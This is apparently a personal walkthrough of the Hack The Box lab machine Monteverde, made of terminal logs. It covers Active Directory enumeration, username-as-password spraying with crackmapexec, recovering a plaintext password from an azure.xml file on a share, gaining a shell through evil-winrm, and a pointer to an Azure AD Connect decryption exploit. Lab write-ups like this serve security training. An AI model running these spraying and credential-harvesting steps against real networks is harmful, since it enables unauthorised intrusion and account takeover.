Monteverde

nmap scan

┌──(kali㉿kali)-[~/HTB/Monteverde]
└─$ nmap -sV -sC -oA mantis  10.10.10.172 -pn
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-24 07:41 EDT
zsh: segmentation fault  nmap -sV -sC -oA mantis 10.10.10.172 -pn
                                                                                                                                                                                                        
┌──(kali㉿kali)-[~/HTB/Monteverde]
└─$ nmap -sV -sC -oA Monteverde  10.10.10.172 -Pn  
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-24 07:41 EDT
Nmap scan report for 10.10.10.172
Host is up (0.36s latency).
Not shown: 989 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2023-09-24 11:42:15Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: MEGABANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: MEGABANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
Service Info: Host: MONTEVERDE; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2023-09-24T11:42:53
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 167.93 seconds
                                                                                                                                                                                                        
┌──(kali㉿kali)-[~/HTB/Monteverde]
└─$ 

Running a full scan in the background to check later if any other new ports

┌──(kali㉿kali)-[~/HTB/Monteverde]
└─$ crackmapexec smb 10.10.10.172 -u '' -p ''
SMB         10.10.10.172    445    MONTEVERDE       [*] Windows 10.0 Build 17763 x64 (name:MONTEVERDE) (domain:MEGABANK.LOCAL) (signing:True) (SMBv1:False)
SMB         10.10.10.172    445    MONTEVERDE       [+] MEGABANK.LOCAL\: 
                                                                                                   
┌──(kali㉿kali)-[~/HTB/Monteverde]

adding the domain to the hosts file

127.0.0.1       localhost
127.0.1.1       kali
::1             localhost ip6-localhost ip6-loopback
ff02::1         ip6-allnodes
ff02::2         ip6-allrouters
10.10.10.175    EGOTISTICAL-BANK.LOCAL
10.10.10.100    active.htb  htb
10.10.10.192    blackfield.local
10.10.10.182    cascade.local
10.10.11.152    timelapse.htb
10.10.10.169    megabank.local  resolute.megabank.local
10.10.10.52     htb.local  mantis.htb.local
10.10.10.179    MEGACORP.LOCAL  MULTIMASTER.MEGACORP.LOCAL
10.10.10.172    MEGABANK.LOCAL  MONTEVERDE.MEGABANK.LOCAL

doing an ldpsearch and we get some users

┌──(kali㉿kali)-[~/HTB/Monteverde]
└─$ ldapsearch -x -H ldap://10.10.10.172 -s base namingcontexts
# extended LDIF
#
# LDAPv3
# base <> (default) with scope baseObject
# filter: (objectclass=*)
# requesting: namingcontexts 
#

#
dn:
namingcontexts: DC=MEGABANK,DC=LOCAL
namingcontexts: CN=Configuration,DC=MEGABANK,DC=LOCAL
namingcontexts: CN=Schema,CN=Configuration,DC=MEGABANK,DC=LOCAL
namingcontexts: DC=DomainDnsZones,DC=MEGABANK,DC=LOCAL
namingcontexts: DC=ForestDnsZones,DC=MEGABANK,DC=LOCAL

# search result
search: 2
result: 0 Success

# numResponses: 2
# numEntries: 1
                                                                                                                                                                                                        
┌──(kali㉿kali)-[~/HTB/Monteverde]
└─$ ldapsearch -x -H ldap://10.10.10.172 -b 'DC=megabank,DC=local' -s sub '(objectClass=person)' sAMAccountName | grep 'sAMAccountName:' | awk -F ': ' '{print $2}'
Guest
MONTEVERDE$
AAD_987d7f2f57d2
mhope
SABatchJobs
svc-ata
svc-bexec
svc-netapp
dgalanos
roleary
smorgan
                                                                                                                                                                                                        
┌──(kali㉿kali)-[~/HTB/Monteverde]
└─$ 

adding the names to a text file users.txt

using kerbrute to check which are valid

┌──(kali㉿kali)-[~/HTB/Monteverde]
└─$ ./kerbrute userenum --dc 10.10.10.172 -d  megabank.LOCAL users.txt

    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: v1.0.3 (9dad6e1) - 09/24/23 - Ronnie Flathers @ropnop

2023/09/24 07:53:54 >  Using KDC(s):
2023/09/24 07:53:54 >   10.10.10.172:88

2023/09/24 07:53:55 >  [+] VALID USERNAME:       [email protected]
2023/09/24 07:53:55 >  [+] VALID USERNAME:       [email protected]
2023/09/24 07:53:55 >  [+] VALID USERNAME:       [email protected]
2023/09/24 07:53:55 >  [+] VALID USERNAME:       [email protected]
2023/09/24 07:53:55 >  [+] VALID USERNAME:       [email protected]
2023/09/24 07:53:55 >  [+] VALID USERNAME:       [email protected]
2023/09/24 07:53:55 >  [+] VALID USERNAME:       [email protected]
2023/09/24 07:53:55 >  [+] VALID USERNAME:       [email protected]
2023/09/24 07:53:55 >  [+] VALID USERNAME:       [email protected]
2023/09/24 07:53:55 >  [+] VALID USERNAME:       [email protected]
2023/09/24 07:53:55 >  [+] VALID USERNAME:       [email protected]
2023/09/24 07:53:55 >  Done! Tested 11 usernames (11 valid) in 0.864 seconds
                                                                                                   
┌──(kali㉿kali)-[~/HTB/Monteverde]

Trying to see which we can get a hash but we get nothing

┌──(kali㉿kali)-[/usr/share/doc/python3-impacket/examples]
└─$ while read -r user; do
    ./GetNPUsers.py megabank.LOCAL/$user -no-pass -dc-ip 10.10.10.172
done < /home/kali/HTB/Monteverde/users.txt 
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Getting TGT for administrator
[-] User administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Getting TGT for MONTEVERDE$
[-] User MONTEVERDE$ doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Getting TGT for AAD_987d7f2f57d2
[-] User AAD_987d7f2f57d2 doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Getting TGT for mhope
[-] User mhope doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Getting TGT for SABatchJobs
[-] User SABatchJobs doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Getting TGT for svc-ata
[-] User svc-ata doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Getting TGT for svc-bexec
[-] User svc-bexec doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Getting TGT for svc-netapp
[-] User svc-netapp doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Getting TGT for dgalanos
[-] User dgalanos doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Getting TGT for roleary
[-] User roleary doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Getting TGT for smorgan
[-] User smorgan doesn't have UF_DONT_REQUIRE_PREAUTH set
                                                                                                   
┌──(kali㉿kali)-[/usr/share/doc/python3-impacket/examples]
└─$ 

check descriptions via ldapsearch but nothing

└─$ ldapsearch -x -H ldap://10.10.10.172 -b "DC=megabank,DC=local" -s sub "(objectClass=user)" sAMAccountName description
# extended LDIF
#
# LDAPv3
# base <DC=megabank,DC=local> with scope subtree
# filter: (objectClass=user)
# requesting: sAMAccountName description 
#

# Guest, Users, MEGABANK.LOCAL
dn: CN=Guest,CN=Users,DC=MEGABANK,DC=LOCAL
description: Built-in account for guest access to the computer/domain
sAMAccountName: Guest

# MONTEVERDE, Domain Controllers, MEGABANK.LOCAL
dn: CN=MONTEVERDE,OU=Domain Controllers,DC=MEGABANK,DC=LOCAL
sAMAccountName: MONTEVERDE$

# AAD_987d7f2f57d2, Users, MEGABANK.LOCAL
dn: CN=AAD_987d7f2f57d2,CN=Users,DC=MEGABANK,DC=LOCAL
description: Service account for the Synchronization Service with installation
  identifier 05c97990-7587-4a3d-b312-309adfc172d9 running on computer MONTEVER
 DE.
sAMAccountName: AAD_987d7f2f57d2

# Mike Hope, London, MegaBank Users, MEGABANK.LOCAL
dn: CN=Mike Hope,OU=London,OU=MegaBank Users,DC=MEGABANK,DC=LOCAL
sAMAccountName: mhope

# SABatchJobs, Service Accounts, MEGABANK.LOCAL
dn: CN=SABatchJobs,OU=Service Accounts,DC=MEGABANK,DC=LOCAL
sAMAccountName: SABatchJobs

# svc-ata, Service Accounts, MEGABANK.LOCAL
dn: CN=svc-ata,OU=Service Accounts,DC=MEGABANK,DC=LOCAL
sAMAccountName: svc-ata

# svc-bexec, Service Accounts, MEGABANK.LOCAL
dn: CN=svc-bexec,OU=Service Accounts,DC=MEGABANK,DC=LOCAL
sAMAccountName: svc-bexec

# svc-netapp, Service Accounts, MEGABANK.LOCAL
dn: CN=svc-netapp,OU=Service Accounts,DC=MEGABANK,DC=LOCAL
sAMAccountName: svc-netapp

# Dimitris Galanos, Athens, MegaBank Users, MEGABANK.LOCAL
dn: CN=Dimitris Galanos,OU=Athens,OU=MegaBank Users,DC=MEGABANK,DC=LOCAL
sAMAccountName: dgalanos

# Ray O'Leary, Toronto, MegaBank Users, MEGABANK.LOCAL
dn: CN=Ray O'Leary,OU=Toronto,OU=MegaBank Users,DC=MEGABANK,DC=LOCAL
sAMAccountName: roleary

# Sally Morgan, New York, MegaBank Users, MEGABANK.LOCAL
dn: CN=Sally Morgan,OU=New York,OU=MegaBank Users,DC=MEGABANK,DC=LOCAL
sAMAccountName: smorgan

# search reference
ref: ldap://ForestDnsZones.MEGABANK.LOCAL/DC=ForestDnsZones,DC=MEGABANK,DC=LOC
 AL

# search reference
ref: ldap://DomainDnsZones.MEGABANK.LOCAL/DC=DomainDnsZones,DC=MEGABANK,DC=LOC
 AL

# search reference
ref: ldap://MEGABANK.LOCAL/CN=Configuration,DC=MEGABANK,DC=LOCAL

# search result
search: 2
result: 0 Success

# numResponses: 15
# numEntries: 11
# numReferences: 3

also checked for custom objects but nothing pops out.excerpt below

┌──(kali㉿kali)-[/usr/share/doc/python3-impacket/examples]
└─$ ldapsearch -x -H ldap://10.10.10.172 -b 'DC=megabank,DC=local' -s sub | awk '{print $1}' | sort | uniq -c | sort -nr
    697 dSCorePropagationData:
    548 objectClass:
    281 #
    272 
    267 dn:
    246 whenCreated:
    246 whenChanged:
    246 uSNCreated:
    246 uSNChanged:
    246 objectGUID::
    246 objectCategory:
    246 name:
    246 instanceType:
    246 distinguishedName:
    222 cn:
    177 showInAdvancedViewOnly:
    102 System,DC=MEGABANK,DC=LOCAL
     88 BANK.LOCAL
     87 mainUpdates,CN=System,DC=MEGABANK,DC=LOCAL
     87 isCriticalSystemObject:

trying rpcclient . we find the same users

                                                                                                   
┌──(kali㉿kali)-[/usr/share/doc/python3-impacket/examples]
└─$ rpcclient -U '' -N 10.10.10.172
rpcclient

gt; lookup smorgan command not found: lookup rpcclient

gt; lookupnames smorgan result was NT_STATUS_ACCESS_DENIED rpcclient

gt; lookupnames SABatchJobs result was NT_STATUS_ACCESS_DENIED rpcclient

gt; enumdomusers user:[Guest] rid:[0x1f5] user:[AAD_987d7f2f57d2] rid:[0x450] user:[mhope] rid:[0x641] user:[SABatchJobs] rid:[0xa2a] user:[svc-ata] rid:[0xa2b] user:[svc-bexec] rid:[0xa2c] user:[svc-netapp] rid:[0xa2d] user:[dgalanos] rid:[0xa35] user:[roleary] rid:[0xa36] user:[smorgan] rid:[0xa37] rpcclient

gt; rpcclient

gt; enumdomgroups group:[Enterprise Read-only Domain Controllers] rid:[0x1f2] group:[Domain Users] rid:[0x201] group:[Domain Guests] rid:[0x202] group:[Domain Computers] rid:[0x203] group:[Group Policy Creator Owners] rid:[0x208] group:[Cloneable Domain Controllers] rid:[0x20a] group:[Protected Users] rid:[0x20d] group:[DnsUpdateProxy] rid:[0x44e] group:[Azure Admins] rid:[0xa29] group:[File Server Admins] rid:[0xa2e] group:[Call Recording Admins] rid:[0xa2f] group:[Reception] rid:[0xa30] group:[Operations] rid:[0xa31] group:[Trading] rid:[0xa32] group:[HelpDesk] rid:[0xa33] group:[Developers] rid:[0xa34] rpcclient

gt; 

trying to enumerate the shares

┌──(kali㉿kali)-[~/HTB/Monteverde]
└─$ crackmapexec smb 10.10.10.172 -u '' -p ''
SMB         10.10.10.172    445    MONTEVERDE       [*] Windows 10.0 Build 17763 x64 (name:MONTEVERDE) (domain:MEGABANK.LOCAL) (signing:True) (SMBv1:False)
SMB         10.10.10.172    445    MONTEVERDE       [+] MEGABANK.LOCAL\: 
                                                                                                   
┌──(kali㉿kali)-[~/HTB/Monteverde]
└─$ crackmapexec smb 10.10.10.172 -u '' -p '' --shares        
SMB         10.10.10.172    445    MONTEVERDE       [*] Windows 10.0 Build 17763 x64 (name:MONTEVERDE) (domain:MEGABANK.LOCAL) (signing:True) (SMBv1:False)
SMB         10.10.10.172    445    MONTEVERDE       [+] MEGABANK.LOCAL\: 
SMB         10.10.10.172    445    MONTEVERDE       [-] Error enumerating shares: STATUS_ACCESS_DENIED
                                                                                                   
┌──(kali㉿kali)-[~/HTB/Monteverde]
└─$ smbclient -L //10.10.10.172       
Password for [WORKGROUP\kali]:
Anonymous login successful

        Sharename       Type      Comment
        ---------       ----      -------
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.10.172 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
                                                                                                   
┌──(kali㉿kali)-[~/HTB/Monteverde]
└─$ smbclient -L //10.10.10.172 -N -U%                

        Sharename       Type      Comment
        ---------       ----      -------
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.10.172 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
                                                            

Running out of options. Will try create a password list to brutforce using,

First we check the password policy and we can see “Account Lockout Threshold: None”

┌──(kali㉿kali)-[~/HTB/Monteverde]
└─$ crackmapexec smb 10.10.10.172 --pass-pol
SMB         10.10.10.172    445    MONTEVERDE       [*] Windows 10.0 Build 17763 x64 (name:MONTEVERDE) (domain:MEGABANK.LOCAL) (signing:True) (SMBv1:False)
SMB         10.10.10.172    445    MONTEVERDE       [+] Dumping password info for domain: MEGABANK
SMB         10.10.10.172    445    MONTEVERDE       Minimum password length: 7
SMB         10.10.10.172    445    MONTEVERDE       Password history length: 24
SMB         10.10.10.172    445    MONTEVERDE       Maximum password age: 41 days 23 hours 53 minutes 
SMB         10.10.10.172    445    MONTEVERDE       
SMB         10.10.10.172    445    MONTEVERDE       Password Complexity Flags: 000000
SMB         10.10.10.172    445    MONTEVERDE           Domain Refuse Password Change: 0
SMB         10.10.10.172    445    MONTEVERDE           Domain Password Store Cleartext: 0
SMB         10.10.10.172    445    MONTEVERDE           Domain Password Lockout Admins: 0
SMB         10.10.10.172    445    MONTEVERDE           Domain Password No Clear Change: 0
SMB         10.10.10.172    445    MONTEVERDE           Domain Password No Anon Change: 0
SMB         10.10.10.172    445    MONTEVERDE           Domain Password Complex: 0
SMB         10.10.10.172    445    MONTEVERDE       
SMB         10.10.10.172    445    MONTEVERDE       Minimum password age: 1 day 4 minutes 
SMB         10.10.10.172    445    MONTEVERDE       Reset Account Lockout Counter: 30 minutes 
SMB         10.10.10.172    445    MONTEVERDE       Locked Account Duration: 30 minutes 
SMB         10.10.10.172    445    MONTEVERDE       Account Lockout Threshold: None
SMB         10.10.10.172    445    MONTEVERDE       Forced Log off Time: Not Set

Creating a password list with john the reaper

└─$ john --wordlist=users.txt --rules --stdout > users2.txt

using crackmapexec to try and bruteforce

[~/HTB/Monteverde]
└─$ crackmapexec smb 10.10.10.172 -u users.txt -p users4.txt

SMB         10.10.10.172    445    MONTEVERDE       [*] Windows 10.0 Build 17763 x64 (name:MONTEVERDE) (domain:MEGABANK.LOCAL) (signing:True) (SMBv1:False)
SMB         10.10.10.172    445    MONTEVERDE       [+] MEGABANK.LOCAL\SABatchJobs:SABatchJobs 

user SABatchJobs and password SABatchJobs

┌──(kali㉿kali)-[~/HTB/Monteverde]
└─$ crackmapexec smb 10.10.10.172 -u SABatchJobs -p SABatchJobs --shares
SMB         10.10.10.172    445    MONTEVERDE       [*] Windows 10.0 Build 17763 x64 (name:MONTEVERDE) (domain:MEGABANK.LOCAL) (signing:True) (SMBv1:False)
SMB         10.10.10.172    445    MONTEVERDE       [+] MEGABANK.LOCAL\SABatchJobs:SABatchJobs 
SMB         10.10.10.172    445    MONTEVERDE       [+] Enumerated shares
SMB         10.10.10.172    445    MONTEVERDE       Share           Permissions     Remark
SMB         10.10.10.172    445    MONTEVERDE       -----           -----------     ------
SMB         10.10.10.172    445    MONTEVERDE       ADMIN$                          Remote Admin
SMB         10.10.10.172    445    MONTEVERDE       azure_uploads   READ            
SMB         10.10.10.172    445    MONTEVERDE       C$                              Default share
SMB         10.10.10.172    445    MONTEVERDE       E$                              Default share
SMB         10.10.10.172    445    MONTEVERDE       IPC$            READ            Remote IPC
SMB         10.10.10.172    445    MONTEVERDE       NETLOGON        READ            Logon server share 
SMB         10.10.10.172    445    MONTEVERDE       SYSVOL          READ            Logon server share 
SMB         10.10.10.172    445    MONTEVERDE       users$          READ            
                                                                                                   
┌──(kali㉿kali)-[~/HTB/Monteverde]
└─$ crackmapexec winrm 10.10.10.172 -u SABatchJobs -p SABatchJobs --shares
usage: crackmapexec [-h] [-t THREADS] [--timeout TIMEOUT] [--jitter INTERVAL] [--darrell]
                    [--verbose]
                    {ldap,smb,mssql,rdp,ftp,winrm,ssh} ...
crackmapexec: error: unrecognized arguments: --shares
                                                                                                   
┌──(kali㉿kali)-[~/HTB/Monteverde]
└─$ crackmapexec winrm 10.10.10.172 -u SABatchJobs -p SABatchJobs         
SMB         10.10.10.172    5985   MONTEVERDE       [*] Windows 10.0 Build 17763 (name:MONTEVERDE) (domain:MEGABANK.LOCAL)
HTTP        10.10.10.172    5985   MONTEVERDE       [*] http://10.10.10.172:5985/wsman
WINRM       10.10.10.172    5985   MONTEVERDE       [-] MEGABANK.LOCAL\SABatchJobs:SABatchJobs
                                                                                                   
┌──(kali㉿kali)-[~/HTB/Monteverde]
└─$ SMB         10.10.10.172    445    MONTEVERDE       [+] MEGABANK.LOCAL\SABatchJobs:SABatchJobs 
                                                                                                   
┌──(kali㉿kali)-[~/HTB/Monteverde]
└─$ smbclient //10.10.10.172/users$ -U SABatchJobs%SABatchJobs
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Fri Jan  3 08:12:48 2020
  ..                                  D        0  Fri Jan  3 08:12:48 2020
  dgalanos                            D        0  Fri Jan  3 08:12:30 2020
  mhope                               D        0  Fri Jan  3 08:41:18 2020
  roleary                             D        0  Fri Jan  3 08:10:30 2020
  smorgan                             D        0  Fri Jan  3 08:10:24 2020

                31999 blocks of size 4096. 28979 blocks available
smb: \> cd dgalanos\
smb: \dgalanos\> ls
  .                                   D        0  Fri Jan  3 08:12:30 2020
  ..                                  D        0  Fri Jan  3 08:12:30 2020
cd .
                31999 blocks of size 4096. 28979 blocks available
smb: \dgalanos\> cd ../
smb: \> cd mhop
cd \mhop\: NT_STATUS_OBJECT_NAME_NOT_FOUND
smb: \> cd mhope
smb: \mhope\> ls
  .                                   D        0  Fri Jan  3 08:41:18 2020
  ..                                  D        0  Fri Jan  3 08:41:18 2020
  azure.xml                          AR     1212  Fri Jan  3 08:40:23 2020

                31999 blocks of size 4096. 28979 blocks available
smb: \mhope\> get azure.xml 
getting file \mhope\azure.xml of size 1212 as azure.xml (0.7 KiloBytes/sec) (average 0.7 KiloBytes/sec)
smb: \mhope\> cd ../
smb: \> cd rolearty
cd \rolearty\: NT_STATUS_OBJECT_NAME_NOT_FOUND
smb: \> cd roleary
smb: \roleary\> ls
  .                                   D        0  Fri Jan  3 08:10:30 2020
  ..                                  D        0  Fri Jan  3 08:10:30 2020
cd ../
                31999 blocks of size 4096. 28979 blocks available
smb: \roleary\> cd ../
smb: \> cd smorgan
smb: \smorgan\> ls
  .                                   D        0  Fri Jan  3 08:10:24 2020
  ..                                  D        0  Fri Jan  3 08:10:24 2020

                31999 blocks of size 4096. 28979 blocks available
smb: \smorgan\> ^C
                                                                                                   
┌──(kali㉿kali)-[~/HTB/Monteverde]
└─$ smbclient //10.10.10.172/azure_uploads -U SABatchJobs%SABatchJobs
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Fri Jan  3 07:43:06 2020
  ..                                  D        0  Fri Jan  3 07:43:06 2020

                31999 blocks of size 4096. 28979 blocks available
smb: \> SMBecho failed (NT_STATUS_CONNECTION_RESET). The connection is disconnected now

checking the xml file

└─$ cat azure.xml 
��<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
  <Obj RefId="0">
    <TN RefId="0">
      <T>Microsoft.Azure.Commands.ActiveDirectory.PSADPasswordCredential</T>
      <T>System.Object</T>
    </TN>
    <ToString>Microsoft.Azure.Commands.ActiveDirectory.PSADPasswordCredential</ToString>
    <Props>
      <DT N="StartDate">2020-01-03T05:35:00.7562298-08:00</DT>
      <DT N="EndDate">2054-01-03T05:35:00.7562298-08:00</DT>
      <G N="KeyId">00000000-0000-0000-0000-000000000000</G>
      <S N="Password">4n0therD4y@n0th3r

lt;/S> </Props> </Obj> </Objs> ┌──(kali㉿kali)-[~/HTB/Monteverde] └─$ 

we see a password in there 4n0therD4y@n0th3r$

we try and check the password against the users and we get that this is the password for mhope

┌──(kali㉿kali)-[~/HTB/Monteverde]
└─$ ls
azure.xml  mantis.gnmap  mantis.xml        Monteverde.nmap  users2.txt  users4.txt
kerbrute   mantis.nmap   Monteverde.gnmap  Monteverde.xml   users3.txt  users.txt
                                                                                                   
┌──(kali㉿kali)-[~/HTB/Monteverde]
└─$ nano users.txt
                                                                                                   
┌──(kali㉿kali)-[~/HTB/Monteverde]
└─$ crackmapexec smb 10.10.10.179 -u users.txt -p '4n0therD4y@n0th3r'  
                                                                                                   
┌──(kali㉿kali)-[~/HTB/Monteverde]
└─$ crackmapexec smb 10.10.10.172 -u users.txt -p '4n0therD4y@n0th3r'
SMB         10.10.10.172    445    MONTEVERDE       [*] Windows 10.0 Build 17763 x64 (name:MONTEVERDE) (domain:MEGABANK.LOCAL) (signing:True) (SMBv1:False)
SMB         10.10.10.172    445    MONTEVERDE       [-] MEGABANK.LOCAL\SABatchJobs:4n0therD4y@n0th3r$ STATUS_LOGON_FAILURE 
SMB         10.10.10.172    445    MONTEVERDE       [-] MEGABANK.LOCAL\administrator:4n0therD4y@n0th3r$ STATUS_LOGON_FAILURE 
SMB         10.10.10.172    445    MONTEVERDE       [-] MEGABANK.LOCAL\AAD_987d7f2f57d2:4n0therD4y@n0th3r$ STATUS_LOGON_FAILURE 
SMB         10.10.10.172    445    MONTEVERDE       [+] MEGABANK.LOCAL\mhope:4n0therD4y@n0th3r$ 
                                                                                                   
┌──(kali㉿kali)-[~/HTB/Monteverde]
└─$ 

we are able to test and get in with evilwinrm

┌──(kali㉿kali)-[~/HTB/Monteverde]
└─$ crackmapexec winrm 10.10.10.172 -u mhope -p '4n0therD4y@n0th3r'
SMB         10.10.10.172    5985   MONTEVERDE       [*] Windows 10.0 Build 17763 (name:MONTEVERDE) (domain:MEGABANK.LOCAL)
HTTP        10.10.10.172    5985   MONTEVERDE       [*] http://10.10.10.172:5985/wsman
WINRM       10.10.10.172    5985   MONTEVERDE       [+] MEGABANK.LOCAL\mhope:4n0therD4y@n0th3r$ (Pwn3d!)
                                                                                                   
┌──(kali㉿kali)-[~/HTB/Monteverde]
└─$ evil-winrm -i  10.10.10.172 -u mhope -p '4n0therD4y@n0th3r'
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\mhope\Documents> cd ../
*Evil-WinRM* PS C:\Users\mhope> cd Desktop
*Evil-WinRM* PS C:\Users\mhope\Desktop> cat user.txt
bfec682a8877066eb64829042af046a4
*Evil-WinRM* PS C:\Users\mhope\Desktop> 

Priv escalation

download and run winpeas

┌──(kali㉿kali)-[~/HTB/Monteverde]
└─$ evil-winrm -i  10.10.10.172 -u mhope -p '4n0therD4y@n0th3r'

winpeas suggested to look at file “RoamingCredentialSettings.xml” so downloaded it

*Evil-WinRM* PS C:\users\all users\Microsoft\uEV\InboxTemplates> get RoamingCredentialSettings.xml
The term 'get' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again.
At line:1 char:1
+ get RoamingCredentialSettings.xml
+ ~~~
    + CategoryInfo          : ObjectNotFound: (get:String) [], CommandNotFoundException
    + FullyQualifiedErrorId : CommandNotFoundException
*Evil-WinRM* PS C:\users\all users\Microsoft\uEV\InboxTemplates> download RoamingCredentialSettings.xml
                                        
Info: Downloading C:\users\all users\Microsoft\uEV\InboxTemplates\RoamingCredentialSettings.xml to RoamingCredentialSettings.xml                                                                      
                                        
Info: Download successful!
*Evil-WinRM* PS C:\users\all users\Microsoft\uEV\InboxTemplates> 

nothing much in that file

└─$ cat RoamingCredentialSettings.xml
<?xml version="1.0" encoding="utf-8"?>
<!--
Modifying the settings location templates for an application or a 
Windows setting group provided with Microsoft User Experience Virtualization 
may cause synchronization for the modified settings to fail. 
For more information about settings location templates please see 
the UE-V product documentation.  http://go.microsoft.com/fwlink/?LinkId=260889
-->

<SettingsLocationTemplate xmlns='http://schemas.microsoft.com/UserExperienceVirtualization/2013/SettingsLocationTemplate'>
  <!-- Roaming Credential settings -->
  <Name>Roaming Credential Settings</Name>
  <ID>RoamingCredentialSettings</ID>
  <LocalizedNames>
    <Name Locale='en-us'>Roaming Credential Settings</Name>
    <Name Locale='cs-cz'>Nastavení cestovních přihlašovacích údajů</Name>
    <Name Locale='da-dk'>Indstillinger for roaminglegitimationsoplysninger</Name>
    <Name Locale='de-de'>Einstellungen für servergespeicherte Anmeldeinformationen</Name>
    <Name Locale='el-gr'>Ρυθμίσεις διαπιστευτηρίων περιαγωγής</Name>
    <Name Locale='es-es'>Configuración de credenciales móviles</Name>
    <Name Locale='fi-fi'>Verkkovierailutunnistetietojen asetukset</Name>
    <Name Locale='fr-fr'>Paramètres d’informations d’identification itinerants</Name>
    <Name Locale='hu-hu'>Hordozható hitelesítőadat-beállítások</Name>
    <Name Locale='it-it'>Impostazioni per le credenziali di roaming</Name>
    <Name Locale='ja-jp'>移動資格情報の設定</Name>
    <Name Locale='ko-kr'>로밍 자격 증명 설정</Name>
    <Name Locale='nb-no'>Innstillinger for sentrallegitimasjon</Name>
    <Name Locale='nl-nl'>Referentie-instellingen voor roaming</Name>
    <Name Locale='pl-pl'>Ustawienia poświadczeń mobilnych</Name>
    <Name Locale='pt-br'>Configurações de Credenciais de Roaming</Name>
    <Name Locale='pt-pt'>Definições de Credencial de Roaming</Name>
    <Name Locale='ru-ru'>Параметры перемещаемых учетных данных</Name>
    <Name Locale='sk-sk'>Nastavenia zdieľania poverení</Name>
    <Name Locale='sl-si'>Nastavitve poverilnic za gostovanje</Name>
    <Name Locale='sv-se'>Autentiseringsinställningar för nätverksväxling</Name>
    <Name Locale='tr-tr'>Dolaşım Kimlik Bilgileri Ayarları</Name>
    <Name Locale='zh-cn'>漫游凭据设置</Name>
    <Name Locale='zh-tw'>漫遊認證設定</Name>
  </LocalizedNames>
  <Version>0</Version>
  <DeferToMSAccount/>
  <Processes>
    <ShellProcess/>
  </Processes>

  <Settings>
    <File>
      <Root>
        <EnvironmentVariable>USERPROFILE</EnvironmentVariable>
      </Root>
      <Path Recursive="true">AppData\Roaming\Microsoft\Credentials</Path>
    </File>
    <File>
      <Root>
        <EnvironmentVariable>USERPROFILE</EnvironmentVariable>
      </Root>
      <Path Recursive="true">AppData\Roaming\Microsoft\Crypto</Path>
    </File>
    <File>
      <Root>
        <EnvironmentVariable>USERPROFILE</EnvironmentVariable>
      </Root>
      <Path Recursive="true">AppData\Roaming\Microsoft\Protect</Path>
    </File>
    <File>
      <Root>
        <EnvironmentVariable>USERPROFILE</EnvironmentVariable>
      </Root>
      <Path Recursive="true">AppData\Roaming\Microsoft\SystemCertificates</Path>
    </File>
  </Settings>
</SettingsLocationTemplate>                                                                                                   
┌──(kali㉿kali)-[~/HTB/Monteverde]

this exploit is available for privesc

Link https://vbscrub.com/2020/01/14/azure-ad-connect-database-exploit-priv-esc/

Command to run

AdDecrypt.exe -FullSQL_
This program must be run while the AD Sync Bin folder is your “working directory”, or has been added to the PATH variable. An easy way to do this is simply navigate to the folder in Powershell or Command Prompt (i.e _cd “C:\Program Files\Microsoft Azure AD Sync\Bin”_), and then run the program by typing the full path to wherever you have stored it. You also need to make sure the mcrypt.dll from the download link is in the same directory the program is in. Failure to do either of these things will result in a Module Not Found error
